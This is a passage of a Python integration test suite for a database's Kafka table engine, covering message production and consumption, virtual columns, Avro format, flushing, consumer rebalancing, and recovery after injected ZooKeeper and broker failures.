DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt2',
kafka_group_name = 'virt2',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64, kafka_key String, topic String, offset UInt64, partition UInt64, timestamp Nullable(DateTime('UTC')))
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT *, _key as kafka_key, _topic as topic, _offset as offset, _partition as partition, _timestamp = 0 ? '0000-00-00 00:00:00' : toString(_timestamp) as timestamp FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'virt2', messages, 0)
sql = 'SELECT kafka_key, key, topic, value, offset, partition, timestamp FROM test.view ORDER BY kafka_key, key'
result = instance.query(sql)
iterations = 0
while not kafka_check_result(result, False, 'test_kafka_virtual2.reference') and iterations < 10:
time.sleep(3)
iterations += 1
result = instance.query(sql)
kafka_check_result(result, True, 'test_kafka_virtual2.reference')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
def test_kafka_insert(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert1',
kafka_group_name = 'insert1',
kafka_format = 'TSV',
kafka_commit_on_select = 1,
kafka_row_delimiter = '\\n';
''')
values = []
for i in range(50):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
while True:
try:
instance.query("INSERT INTO test.kafka VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
messages = []
while True:
messages.extend(kafka_consume(kafka_cluster, 'insert1'))
if len(messages) == 50:
break
result = '\n'.join(messages)
kafka_check_result(result, True)
def test_kafka_produce_consume(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert2',
kafka_group_name = 'insert2',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages_num = 10000
def insert():
values = []
for i in range(messages_num):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
while True:
try:
instance.query("INSERT INTO test.kafka VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
threads = []
threads_num = 16
for _ in range(threads_num):
threads.append(threading.Thread(target=insert))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
while True:
result = instance.query('SELECT count() FROM test.view')
time.sleep(1)
if int(result) == messages_num * threads_num:
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
for thread in threads:
thread.join()
assert int(result) == messages_num * threads_num, 'ClickHouse lost some messages: {}'.format(result)
def test_kafka_commit_on_block_write(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'block',
kafka_group_name = 'block',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
cancel = threading.Event()
i = [0]
def produce():
while not cancel.is_set():
messages = []
for _ in range(101):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
kafka_produce(kafka_cluster, 'block', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
while int(instance.query('SELECT count() FROM test.view')) == 0:
time.sleep(1)
cancel.set()
instance.query('''
DROP TABLE test.kafka;
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'block',
kafka_group_name = 'block',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
''')
while int(instance.query('SELECT uniqExact(key) FROM test.view')) < i[0]:
time.sleep(1)
result = int(instance.query('SELECT count() == uniqExact(key) FROM test.view'))
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_thread.join()
assert result == 1, 'Messages from kafka get duplicated!'
def test_kafka_virtual_columns2(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_config = {
# default retention, since predefined timestamp_ms is used.
'retention.ms': '-1',
}
kafka_create_topic(admin_client, "virt2_0", num_partitions=2, config=topic_config)
kafka_create_topic(admin_client, "virt2_1", num_partitions=2, config=topic_config)
instance.query('''
CREATE TABLE test.kafka (value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt2_0,virt2_1',
kafka_group_name = 'virt2',
kafka_num_consumers = 2,
kafka_format = 'JSONEachRow';
CREATE MATERIALIZED VIEW test.view Engine=Log AS
SELECT value, _key, _topic, _partition, _offset, toUnixTimestamp(_timestamp), toUnixTimestamp64Milli(_timestamp_ms), _headers.name, _headers.value FROM test.kafka;
''')
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(cluster.kafka_port), value_serializer=producer_serializer, key_serializer=producer_serializer)
producer.send(topic='virt2_0', value=json.dumps({'value': 1}), partition=0, key='k1', timestamp_ms=1577836801001,
headers=[('content-encoding', b'base64')])
producer.send(topic='virt2_0', value=json.dumps({'value': 2}), partition=0, key='k2', timestamp_ms=1577836802002,
headers=[('empty_value', b''), ('', b'empty name'), ('', b''), ('repetition', b'1'), ('repetition', b'2')])
producer.flush()
producer.send(topic='virt2_0', value=json.dumps({'value': 3}), partition=1, key='k3', timestamp_ms=1577836803003,
headers=[('b', b'b'), ('a', b'a')])
producer.send(topic='virt2_0', value=json.dumps({'value': 4}), partition=1, key='k4', timestamp_ms=1577836804004,
headers=[('a', b'a'), ('b', b'b')])
producer.flush()
producer.send(topic='virt2_1', value=json.dumps({'value': 5}), partition=0, key='k5', timestamp_ms=1577836805005)
producer.send(topic='virt2_1', value=json.dumps({'value': 6}), partition=0, key='k6', timestamp_ms=1577836806006)
producer.flush()
producer.send(topic='virt2_1', value=json.dumps({'value': 7}), partition=1, key='k7', timestamp_ms=1577836807007)
producer.send(topic='virt2_1', value=json.dumps({'value': 8}), partition=1, key='k8', timestamp_ms=1577836808008)
producer.flush()
instance.wait_for_log_line('kafka.*Committed offset 2.*virt2_[01]', repetitions=4, look_behind_lines=6000)
members = describe_consumer_group(kafka_cluster, 'virt2')
# pprint.pprint(members)
# members[0]['client_id'] = 'ClickHouse-instance-test-kafka-0'
# members[1]['client_id'] = 'ClickHouse-instance-test-kafka-1'
result = instance.query("SELECT * FROM test.view ORDER BY value", ignore_error=True)
expected = '''\
1 k1 virt2_0 0 0 1577836801 1577836801001 ['content-encoding'] ['base64']
2 k2 virt2_0 0 1 1577836802 1577836802002 ['empty_value','','','repetition','repetition'] ['','empty name','','1','2']
3 k3 virt2_0 1 0 1577836803 1577836803003 ['b','a'] ['b','a']
4 k4 virt2_0 1 1 1577836804 1577836804004 ['a','b'] ['a','b']
5 k5 virt2_1 0 0 1577836805 1577836805005 [] []
6 k6 virt2_1 0 1 1577836806 1577836806006 [] []
7 k7 virt2_1 1 0 1577836807 1577836807007 [] []
8 k8 virt2_1 1 1 1577836808 1577836808008 [] []
'''
assert TSV(result) == TSV(expected)
instance.query('''
DROP TABLE test.kafka;
DROP TABLE test.view;
''')
kafka_delete_topic(admin_client, "virt2_0")
kafka_delete_topic(admin_client, "virt2_1")
instance.rotate_logs()
def test_kafka_produce_key_timestamp(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_name = "insert3"
kafka_create_topic(admin_client, topic_name)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka_writer (key UInt64, value UInt64, _key String, _timestamp DateTime('UTC'))
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert3',
kafka_group_name = 'insert3',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE TABLE test.kafka (key UInt64, value UInt64, inserted_key String, inserted_timestamp DateTime('UTC'))
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert3',
kafka_group_name = 'insert3',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE MATERIALIZED VIEW test.view Engine=Log AS
SELECT key, value, inserted_key, toUnixTimestamp(inserted_timestamp), _key, _topic, _partition, _offset, toUnixTimestamp(_timestamp) FROM test.kafka;
''')
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(1, 1, 'k1', 1577836801))
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(2, 2, 'k2', 1577836802))
instance.query(
"INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({})),({},{},'{}',toDateTime({}))".format(3, 3,
'k3',
1577836803,
4, 4,
'k4',
1577836804))
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(5, 5, 'k5', 1577836805))
instance.wait_for_log_line("Committed offset 5")
result = instance.query("SELECT * FROM test.view ORDER BY value", ignore_error=True)
# logging.debug(result)
expected = '''\
1 1 k1 1577836801 k1 insert3 0 0 1577836801
2 2 k2 1577836802 k2 insert3 0 1 1577836802
3 3 k3 1577836803 k3 insert3 0 2 1577836803
4 4 k4 1577836804 k4 insert3 0 3 1577836804
5 5 k5 1577836805 k5 insert3 0 4 1577836805
'''
assert TSV(result) == TSV(expected)
kafka_delete_topic(admin_client, topic_name)
def test_kafka_insert_avro(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_config = {
# default retention, since predefined timestamp_ms is used.
'retention.ms': '-1',
}
kafka_create_topic(admin_client, "avro1", config=topic_config)
instance.query('''
DROP TABLE IF EXISTS test.kafka;
CREATE TABLE test.kafka (key UInt64, value UInt64, _timestamp DateTime('UTC'))
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'avro1',
kafka_group_name = 'avro1',
kafka_commit_on_select = 1,
kafka_format = 'Avro';
''')
instance.query("INSERT INTO test.kafka select number*10 as key, number*100 as value, 1636505534 as _timestamp from numbers(4) SETTINGS output_format_avro_rows_in_file = 2, output_format_avro_codec = 'deflate'")
messages = []
while True:
messages.extend(kafka_consume(kafka_cluster, 'avro1', needDecode = False, timestamp = 1636505534))
if len(messages) == 2:
break
result = ''
for a_message in messages:
result += decode_avro(a_message) + '\n'
expected_result = """{'key': 0, 'value': 0, '_timestamp': 1636505534}
{'key': 10, 'value': 100, '_timestamp': 1636505534}
{'key': 20, 'value': 200, '_timestamp': 1636505534}
{'key': 30, 'value': 300, '_timestamp': 1636505534}
"""
assert (result == expected_result)
def test_kafka_produce_consume_avro(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_name = "insert_avro"
kafka_create_topic(admin_client, topic_name)
num_rows = 75
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.kafka_writer;
CREATE TABLE test.kafka_writer (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'avro',
kafka_group_name = 'avro',
kafka_format = 'Avro';
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'avro',
kafka_group_name = 'avro',
kafka_format = 'Avro';
CREATE MATERIALIZED VIEW test.view Engine=Log AS
SELECT key, value FROM test.kafka;
''')
instance.query("INSERT INTO test.kafka_writer select number*10 as key, number*100 as value from numbers({num_rows}) SETTINGS output_format_avro_rows_in_file = 7".format(num_rows=num_rows))
instance.wait_for_log_line("Committed offset {offset}".format(offset=math.ceil(num_rows/7)))
expected_num_rows = instance.query("SELECT COUNT(1) FROM test.view", ignore_error=True)
assert (int(expected_num_rows) == num_rows)
expected_max_key = instance.query("SELECT max(key) FROM test.view", ignore_error=True)
assert (int(expected_max_key) == (num_rows - 1) * 10)
kafka_delete_topic(admin_client, topic_name)
def test_kafka_flush_by_time(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_name = "flush_by_time"
kafka_create_topic(admin_client, topic_name)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush_by_time',
kafka_group_name = 'flush_by_time',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
SELECT * FROM test.kafka;
CREATE TABLE test.view (key UInt64, value UInt64, ts DateTime64(3) MATERIALIZED now64(3))
ENGINE = MergeTree()
ORDER BY key;
''')
cancel = threading.Event()
def produce():
while not cancel.is_set():
messages = []
messages.append(json.dumps({'key': 0, 'value': 0}))
kafka_produce(kafka_cluster, 'flush_by_time', messages)
time.sleep(0.8)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
instance.query('''
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
time.sleep(18)
result = instance.query('SELECT uniqExact(ts) = 2, count() >= 15 FROM test.view')
cancel.set()
kafka_thread.join()
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert TSV(result) == TSV('1 1')
kafka_delete_topic(admin_client, topic_name)
def test_kafka_flush_by_block_size(kafka_cluster):
cancel = threading.Event()
def produce():
while not cancel.is_set():
messages = []
messages.append(json.dumps({'key': 0, 'value': 0}))
kafka_produce(kafka_cluster, 'flush_by_block_size', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush_by_block_size',
kafka_group_name = 'flush_by_block_size',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_poll_max_batch_size = 1,
kafka_flush_interval_ms = 120000, /* should not flush by time during test */
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
# Wait for Kafka engine to consume this data
while 1 != int(instance.query(
"SELECT count() FROM system.parts WHERE database = 'test' AND table = 'view' AND name = 'all_1_1_0'")):
time.sleep(0.5)
cancel.set()
kafka_thread.join()
# more flushes can happens during test, we need to check only result of first flush (part named all_1_1_0).
result = instance.query("SELECT count() FROM test.view WHERE _part='all_1_1_0'")
# logging.debug(result)
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
# 100 = first poll should return 100 messages (and rows)
# not waiting for stream_flush_interval_ms
assert int(
result) == 100, 'Messages from kafka should be flushed when block of size kafka_max_block_size is formed!'
def test_kafka_lot_of_partitions_partial_commit_of_bulk(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_name = "topic_with_multiple_partitions2"
kafka_create_topic(admin_client, topic_name, num_partitions=10)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'topic_with_multiple_partitions2',
kafka_group_name = 'topic_with_multiple_partitions2',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 211,
kafka_flush_interval_ms = 500;
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages = []
count = 0
for dummy_msg in range(1000):
rows = []
for dummy_row in range(random.randrange(3, 10)):
count = count + 1
rows.append(json.dumps({'key': count, 'value': count}))
messages.append("\n".join(rows))
kafka_produce(kafka_cluster, 'topic_with_multiple_partitions2', messages)
instance.wait_for_log_line('kafka.*Stalled', repetitions=5)
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
logging.debug(result)
assert TSV(result) == TSV('{0}\t{0}\t{0}'.format(count))
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_delete_topic(admin_client, topic_name)
def test_kafka_rebalance(kafka_cluster):
NUMBER_OF_CONSURRENT_CONSUMERS = 11
instance.query('''
DROP TABLE IF EXISTS test.destination;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
''')
# kafka_cluster.open_bash_shell('instance')
# time.sleep(2)
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_name = "topic_with_multiple_partitions"
kafka_create_topic(admin_client, topic_name, num_partitions=11)
cancel = threading.Event()
msg_index = [0]
def produce():
while not cancel.is_set():
messages = []
for _ in range(59):
messages.append(json.dumps({'key': msg_index[0], 'value': msg_index[0]}))
msg_index[0] += 1
kafka_produce(kafka_cluster, 'topic_with_multiple_partitions', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
for consumer_index in range(NUMBER_OF_CONSURRENT_CONSUMERS):
table_name = 'kafka_consumer{}'.format(consumer_index)
logging.debug(("Setting up {}".format(table_name)))
instance.query('''
DROP TABLE IF EXISTS test.{0};
DROP TABLE IF EXISTS test.{0}_mv;
CREATE TABLE test.{0} (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'topic_with_multiple_partitions',
kafka_group_name = 'rebalance_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 33,
kafka_flush_interval_ms = 500;
CREATE MATERIALIZED VIEW test.{0}_mv TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp,
'{0}' as _consumed_by
FROM test.{0};
'''.format(table_name))
# kafka_cluster.open_bash_shell('instance')
# Waiting for test.kafka_consumerX to start consume ...
instance.wait_for_log_line('kafka_consumer{}.*Polled offset [0-9]+'.format(consumer_index))
cancel.set()
# I leave last one working by intent (to finish consuming after all rebalances)
for consumer_index in range(NUMBER_OF_CONSURRENT_CONSUMERS - 1):
logging.debug(("Dropping test.kafka_consumer{}".format(consumer_index)))
instance.query('DROP TABLE IF EXISTS test.kafka_consumer{} SYNC'.format(consumer_index))
# logging.debug(instance.query('SELECT count(), uniqExact(key), max(key) + 1 FROM test.destination'))
# kafka_cluster.open_bash_shell('instance')
while 1:
messages_consumed = int(instance.query('SELECT uniqExact(key) FROM test.destination'))
if messages_consumed >= msg_index[0]:
break
time.sleep(1)
logging.debug(("Waiting for finishing consuming (have {}, should be {})".format(messages_consumed, msg_index[0])))
logging.debug((instance.query('SELECT count(), uniqExact(key), max(key) + 1 FROM test.destination')))
# Some queries to debug...
# SELECT * FROM test.destination where key in (SELECT key FROM test.destination group by key having count() <> 1)
# select number + 1 as key from numbers(4141) x left join test.destination using (key) where test.destination.key = 0;
# SELECT * FROM test.destination WHERE key between 2360 and 2370 order by key;
# select _partition from test.destination group by _partition having count() <> max(_offset) + 1;
# select toUInt64(0) as _partition, number + 1 as _offset from numbers(400) x left join test.destination using (_partition,_offset) where test.destination.key = 0 order by _offset;
# SELECT * FROM test.destination WHERE _partition = 0 and _offset between 220 and 240 order by _offset;
# CREATE TABLE test.reference (key UInt64, value UInt64) ENGINE = Kafka SETTINGS kafka_broker_list = 'kafka1:19092',
# kafka_topic_list = 'topic_with_multiple_partitions',
# kafka_group_name = 'rebalance_test_group_reference',
# kafka_format = 'JSONEachRow',
# kafka_max_block_size = 100000;
#
# CREATE MATERIALIZED VIEW test.reference_mv Engine=Log AS
# SELECT key, value, _topic,_key,_offset, _partition, _timestamp, 'reference' as _consumed_by
# FROM test.reference;
#
# select * from test.reference_mv left join test.destination using (key,_topic,_offset,_partition) where test.destination._consumed_by = '';
result = int(instance.query('SELECT count() == uniqExact(key) FROM test.destination'))
for consumer_index in range(NUMBER_OF_CONSURRENT_CONSUMERS):
logging.debug(("kafka_consumer{}".format(consumer_index)))
table_name = 'kafka_consumer{}'.format(consumer_index)
instance.query('''
DROP TABLE IF EXISTS test.{0};
DROP TABLE IF EXISTS test.{0}_mv;
'''.format(table_name))
instance.query('''
DROP TABLE IF EXISTS test.destination;
''')
kafka_thread.join()
assert result == 1, 'Messages from kafka get duplicated!'
kafka_delete_topic(admin_client, topic_name)
def test_kafka_no_holes_when_write_suffix_failed(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': 'x' * 300}) for j in range(22)]
kafka_produce(kafka_cluster, 'no_holes_when_write_suffix_failed', messages)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'no_holes_when_write_suffix_failed',
kafka_group_name = 'no_holes_when_write_suffix_failed',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 20,
kafka_flush_interval_ms = 2000;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = ReplicatedMergeTree('/clickhouse/kafkatest/tables/no_holes_when_write_suffix_failed', 'node1')
ORDER BY key;
''')
# init PartitionManager (it starts container) earlier
pm = PartitionManager()
instance.query('''
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka
WHERE NOT sleepEachRow(0.25);
''')
instance.wait_for_log_line("Polled batch of 20 messages")
# the tricky part here is that disconnect should happen after write prefix, but before write suffix
# we have 0.25 (sleepEachRow) * 20 ( Rows ) = 5 sec window after "Polled batch of 20 messages"
# while materialized view is working to inject zookeeper failure
pm.drop_instance_zk_connections(instance)
instance.wait_for_log_line("Error.*(session has been expired|Connection loss).*while pushing to view")
pm.heal_all()
instance.wait_for_log_line("Committed offset 22")
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
logging.debug(result)
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert TSV(result) == TSV('22\t22\t22')
def test_exception_from_destructor(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'xyz',
kafka_group_name = '',
kafka_commit_on_select = 1,
kafka_format = 'JSONEachRow';
''')
instance.query_and_get_error('''
SELECT * FROM test.kafka;
''')
instance.query('''
DROP TABLE test.kafka;
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'xyz',
kafka_group_name = '',
kafka_format = 'JSONEachRow';
''')
instance.query('''
DROP TABLE test.kafka;
''')
# kafka_cluster.open_bash_shell('instance')
assert TSV(instance.query('SELECT 1')) == TSV('1')
def test_commits_of_unprocessed_messages_on_drop(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(1)]
kafka_produce(kafka_cluster, 'commits_of_unprocessed_messages_on_drop', messages)
instance.query('''
DROP TABLE IF EXISTS test.destination SYNC;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'commits_of_unprocessed_messages_on_drop',
kafka_group_name = 'commits_of_unprocessed_messages_on_drop_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000,
kafka_flush_interval_ms = 1000;
CREATE MATERIALIZED VIEW test.kafka_consumer TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
# Waiting for test.kafka_consumer to start consume
instance.wait_for_log_line('Committed offset [0-9]+')
cancel = threading.Event()
i = [2]
def produce():
while not cancel.is_set():
messages = []
for _ in range(113):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
kafka_produce(kafka_cluster, 'commits_of_unprocessed_messages_on_drop', messages)
time.sleep(0.5)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
time.sleep(4)
instance.query('''
DROP TABLE test.kafka SYNC;
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'commits_of_unprocessed_messages_on_drop',
kafka_group_name = 'commits_of_unprocessed_messages_on_drop_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 10000,
kafka_flush_interval_ms = 1000;
''')
cancel.set()
instance.wait_for_log_line('kafka.*Stalled', repetitions=5)
# kafka_cluster.open_bash_shell('instance')
# SELECT key, _timestamp, _offset FROM test.destination where runningDifference(key) <> 1 ORDER BY key;
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.destination')
logging.debug(result)
instance.query('''
DROP TABLE test.kafka_consumer SYNC;
DROP TABLE test.destination SYNC;
''')
kafka_thread.join()
assert TSV(result) == TSV('{0}\t{0}\t{0}'.format(i[0] - 1)), 'Missing data!'
def test_bad_reschedule(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(20000)]
kafka_produce(kafka_cluster, 'test_bad_reschedule', messages)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'test_bad_reschedule',
kafka_group_name = 'test_bad_reschedule',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000,
kafka_flush_interval_ms = 1000;
CREATE MATERIALIZED VIEW test.destination Engine=Log AS
SELECT
key,
now() as consume_ts,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
instance.wait_for_log_line("Committed offset 20000")
assert int(instance.query("SELECT max(consume_ts) - min(consume_ts) FROM test.destination")) < 8
def test_kafka_duplicates_when_commit_failed(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': 'x' * 300}) for j in range(22)]
kafka_produce(kafka_cluster, 'duplicates_when_commit_failed', messages)
instance.query('''
DROP TABLE IF EXISTS test.view SYNC;
DROP TABLE IF EXISTS test.consumer SYNC;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'duplicates_when_commit_failed',
kafka_group_name = 'duplicates_when_commit_failed',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 20,
kafka_flush_interval_ms = 1000;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = MergeTree()
ORDER BY key;
''')
instance.query('''
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka
WHERE NOT sleepEachRow(0.25);
''')
instance.wait_for_log_line("Polled batch of 20 messages")
# the tricky part here is that disconnect should happen after write prefix, but before we do commit
# we have 0.25 (sleepEachRow) * 20 ( Rows ) = 5 sec window after "Polled batch of 20 messages"
# while materialized view is working to inject zookeeper failure
kafka_cluster.pause_container('kafka1')
# if we restore the connection too fast (<30sec) librdkafka will not report any timeout
# (alternative is to decrease the default session timeouts for librdkafka)
#
# when the delay is too long (>50sec) broker will decide to remove us from the consumer group,
# and will start answering "Broker: Unknown member"
instance.wait_for_log_line("Exception during commit attempt: Local: Waiting for coordinator", timeout=45)
instance.wait_for_log_line("All commit attempts failed", look_behind_lines=500)
kafka_cluster.unpause_container('kafka1')
# kafka_cluster.open_bash_shell('instance')
instance.wait_for_log_line("Committed offset 22")
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
logging.debug(result)
instance.query('''
DROP TABLE test.consumer SYNC;
DROP TABLE test.view SYNC;
''')
# After https://github.com/edenhill/librdkafka/issues/2631
# timeout triggers rebalance, making further commits to the topic after getting back online
# impossible. So we have a duplicate in that scenario, but we report that situation properly.
assert TSV(result) == TSV('42\t22\t22')
# if we came to partition end we will repeat polling until reaching kafka_max_block_size or flush_interval
# that behavior is a bit quesionable - we can just take a bigger pauses between polls instead -
# to do more job in a single pass, and give more rest for a thread.
# But in cases of some peaky loads in kafka topic the current contract sounds more predictable and
# easier to understand, so let's keep it as is for now.
# also we can came to eof because we drained librdkafka internal queue too fast
